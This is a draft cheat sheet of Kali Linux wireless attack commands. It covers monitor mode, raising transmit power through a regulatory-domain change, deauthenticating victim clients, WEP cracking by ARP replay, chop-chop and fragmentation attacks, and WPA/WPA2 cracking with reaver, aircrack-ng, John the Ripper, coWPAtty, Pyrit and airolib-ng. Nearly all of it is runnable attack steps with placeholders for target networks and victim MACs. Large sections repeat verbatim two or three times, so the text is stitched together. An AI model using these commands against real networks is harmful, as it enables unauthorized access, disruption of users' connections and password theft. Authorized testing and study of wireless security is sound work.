
Wireless Penetration Testing Cheat Sheet (DRAFT) by

Wireless Penetration Testing Cheat Sheet

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Wireless Penetration Testing Cheat Sheet

___________________________________________
WIRELESS ANTENNA
___________________________________________
Kill Processes That Interfere With Monitor Mode
root@kali:~# airmon-ng check kill
Enable Monitor Mode
root@kali:~# ifconfig wlan0 down
root@kali:~# airmon-ng start wlan0
# If the airmon-ng command fails, try the following instead:
# iwconfig wlan0 mode monitor
# then use wlan0 instead of mon0 in the commands below
root@kali:~# ifconfig wlan0 up
Increase Wi-Fi TX Power
root@kali:~# iw reg set B0
root@kali:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
# txpower is commonly 30 (dBm)
# The permitted txpower depends on your country's regulatory domain; check the legal limit for your region before raising it
root@kali:~# iwconfig
Change WiFi Channel
root@kali:~# iwconfig wlan0 channel <SetChannel(1-14)>
___________________________________________
FIND HIDDEN SSID
___________________________________________
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> mon0
root@kali:~# aireplay-ng -0 20 -a <BSSID> -c <VictimMac> mon0
___________________________________________
WEP CRACKING (via Client)
___________________________________________
Method 1: ARP Request Replay Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
# What is my MAC address?
root@kali:~# macchanger --show mon0
root@kali:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> mon0
root@kali:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
Method 2: Interactive Packet Replay Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
# What is my MAC address?
root@kali:~# macchanger --show mon0
root@kali:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> mon0
root@kali:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> mon0
root@kali:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
Method 3: SKA (Shared Key Authentication) Type Cracking
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> mon0
root@kali:~# aireplay-ng -1 0 -e <ESSID> -y <keystream file> -a <BSSID> -h <OurMac> mon0
root@kali:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -h <FakedMac> mon0
root@kali:~# aircrack-ng <PCAP_of_FileName>
 

Wireless Penetration Testing Cheat Sheet

___________________________________________
WEP CRACKING (Clientless)
___________________________________________
Method 1: Chop Chop Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
# What is my MAC address?
root@kali:~# macchanger --show mon0
root@kali:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0
root@kali:~# aireplay-ng -4 -b <BSSID> -h <OurMac> mon0
# Press 'y' when prompted
root@kali:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@kali:~# aireplay-ng -2 -r <FileName2> mon0
root@kali:~# aircrack-ng <PCAP_of_FileName>
Method 2: Fragmentation Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
# What is my MAC address?
root@kali:~# macchanger --show mon0
root@kali:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0
root@kali:~# aireplay-ng -5 -b <BSSID> -h <OurMac> mon0
# Press 'y' when prompted
root@kali:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@kali:~# aireplay-ng -2 -r <FileName2> mon0
root@kali:~# aircrack-ng <PCAP_of_FileName>

___________________________________________
WPA / WPA2 CRACKING
___________________________________________
Method 1: WPS Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# apt-get install reaver
root@kali:~# wash -i mon0
root@kali:~# reaver -i mon0 -b <BSSID> -vv -S
# or, a more specific attack (known channel and PIN)
root@kali:~# reaver -i mon0 -c <Channel> -b <BSSID> -p <PinCode> -vv -S
Method 2: Dictionary Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
Method 3: Crack with John The Ripper
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# cd /pentest/passwords/john
root@kali:~# ./john --wordlist=<Wordlist> --rules --stdout | aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>
# or
root@kali:~# aircrack-ng <FileName>.cap -J <outFile>
root@kali:~# hccap2john <outFile>.hccap > <JohnOutFile>
root@kali:~# john <JohnOutFile>
Method 4: Crack with coWPAtty
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
root@kali:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
root@kali:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>
Method 5: Crack with Pyrit
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# pyrit -r <PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
root@kali:~# pyrit -i <Wordlist> import_passwords
root@kali:~# pyrit -e <ESSID> create_essid
root@kali:~# pyrit batch
root@kali:~# pyrit -r <PCAP_of_FileName> attack_db
Method 6: Precomputed WPA Keys Database Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# kwrite ESSID.txt
root@kali:~# airolib-ng NEW_DB --import essid ESSID.txt
root@kali:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
root@kali:~# airolib-ng NEW_DB --clean all
root@kali:~# airolib-ng NEW_DB --stats
root@kali:~# airolib-ng NEW_DB --batch
root@kali:~# airolib-ng NEW_DB --verify all
root@kali:~# aircrack-ng -r NEW_DB <Handshaked_PCAP>

Wireless Penetration Testing Cheat Sheet

___________________________________________
WEP CRACKING (Clientless)
___________________________________________
Method 1: Chop Chop Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
# What is my MAC address?
root@kali:~# macchanger --show mon0
root@kali:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0
root@kali:~# aireplay-ng -4 -b <BSSID> -h <OurMac> mon0
# Press 'y' when prompted
root@kali:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@kali:~# aireplay-ng -2 -r <FileName2> mon0
root@kali:~# aircrack-ng <PCAP_of_FileName>
Method 2: Fragmentation Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
# What is my MAC address?
root@kali:~# macchanger --show mon0
root@kali:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0
root@kali:~# aireplay-ng -5 -b <BSSID> -h <OurMac> mon0
# Press 'y' when prompted
root@kali:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@kali:~# aireplay-ng -2 -r <FileName2> mon0
root@kali:~# aircrack-ng <PCAP_of_FileName>

___________________________________________
WPA / WPA2 CRACKING
___________________________________________
Method 1: WPS Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# apt-get install reaver
root@kali:~# wash -i mon0
root@kali:~# reaver -i mon0 -b <BSSID> -vv -S
# or, a more specific attack (known channel and PIN)
root@kali:~# reaver -i mon0 -c <Channel> -b <BSSID> -p <PinCode> -vv -S
Method 2: Dictionary Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
Method 3: Crack with John The Ripper
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# cd /pentest/passwords/john
root@kali:~# ./john --wordlist=<Wordlist> --rules --stdout | aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>
# or
root@kali:~# aircrack-ng <FileName>.cap -J <outFile>
root@kali:~# hccap2john <outFile>.hccap > <JohnOutFile>
root@kali:~# john <JohnOutFile>
Method 4: Crack with coWPAtty
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
root@kali:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
root@kali:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>
Method 5: Crack with Pyrit
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# pyrit -r <PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
root@kali:~# pyrit -i <Wordlist> import_passwords
root@kali:~# pyrit -e <ESSID> create_essid
root@kali:~# pyrit batch
root@kali:~# pyrit -r <PCAP_of_FileName> attack_db
Method 6: Precomputed WPA Keys Database Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# kwrite ESSID.txt
root@kali:~# airolib-ng NEW_DB --import essid ESSID.txt
root@kali:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
root@kali:~# airolib-ng NEW_DB --clean all
root@kali:~# airolib-ng NEW_DB --stats
root@kali:~# airolib-ng NEW_DB --batch
root@kali:~# airolib-ng NEW_DB --verify all
root@kali:~# aircrack-ng -r NEW_DB <Handshaked_PCAP>
 

WPA / WPA2 Cracking

Method 1: WPS Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# apt-get install reaver
root@kali:~# wash -i mon0
root@kali:~# reaver -i mon0 -b <BSSID> -vv -S
# or, a more specific attack (known channel and PIN)
root@kali:~# reaver -i mon0 -c <Channel> -b <BSSID> -p <PinCode> -vv -S
Method 2: Dictionary Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
Method 3: Crack with John The Ripper
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# cd /pentest/passwords/john
root@kali:~# ./john --wordlist=<Wordlist> --rules --stdout | aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>
# or
root@kali:~# aircrack-ng <FileName>.cap -J <outFile>
root@kali:~# hccap2john <outFile>.hccap > <JohnOutFile>
root@kali:~# john <JohnOutFile>
Method 4: Crack with coWPAtty
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
root@kali:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
root@kali:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>
Method 5: Crack with Pyrit
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# pyrit -r <PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
root@kali:~# pyrit -i <Wordlist> import_passwords
root@kali:~# pyrit -e <ESSID> create_essid
root@kali:~# pyrit batch
root@kali:~# pyrit -r <PCAP_of_FileName> attack_db
Method 6: Precomputed WPA Keys Database Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
root@kali:~# kwrite ESSID.txt
root@kali:~# airolib-ng NEW_DB --import essid ESSID.txt
root@kali:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
root@kali:~# airolib-ng NEW_DB --clean all
root@kali:~# airolib-ng NEW_DB --stats
root@kali:~# airolib-ng NEW_DB --batch
root@kali:~# airolib-ng NEW_DB --verify all
root@kali:~# aircrack-ng -r NEW_DB <Handshaked_PCAP>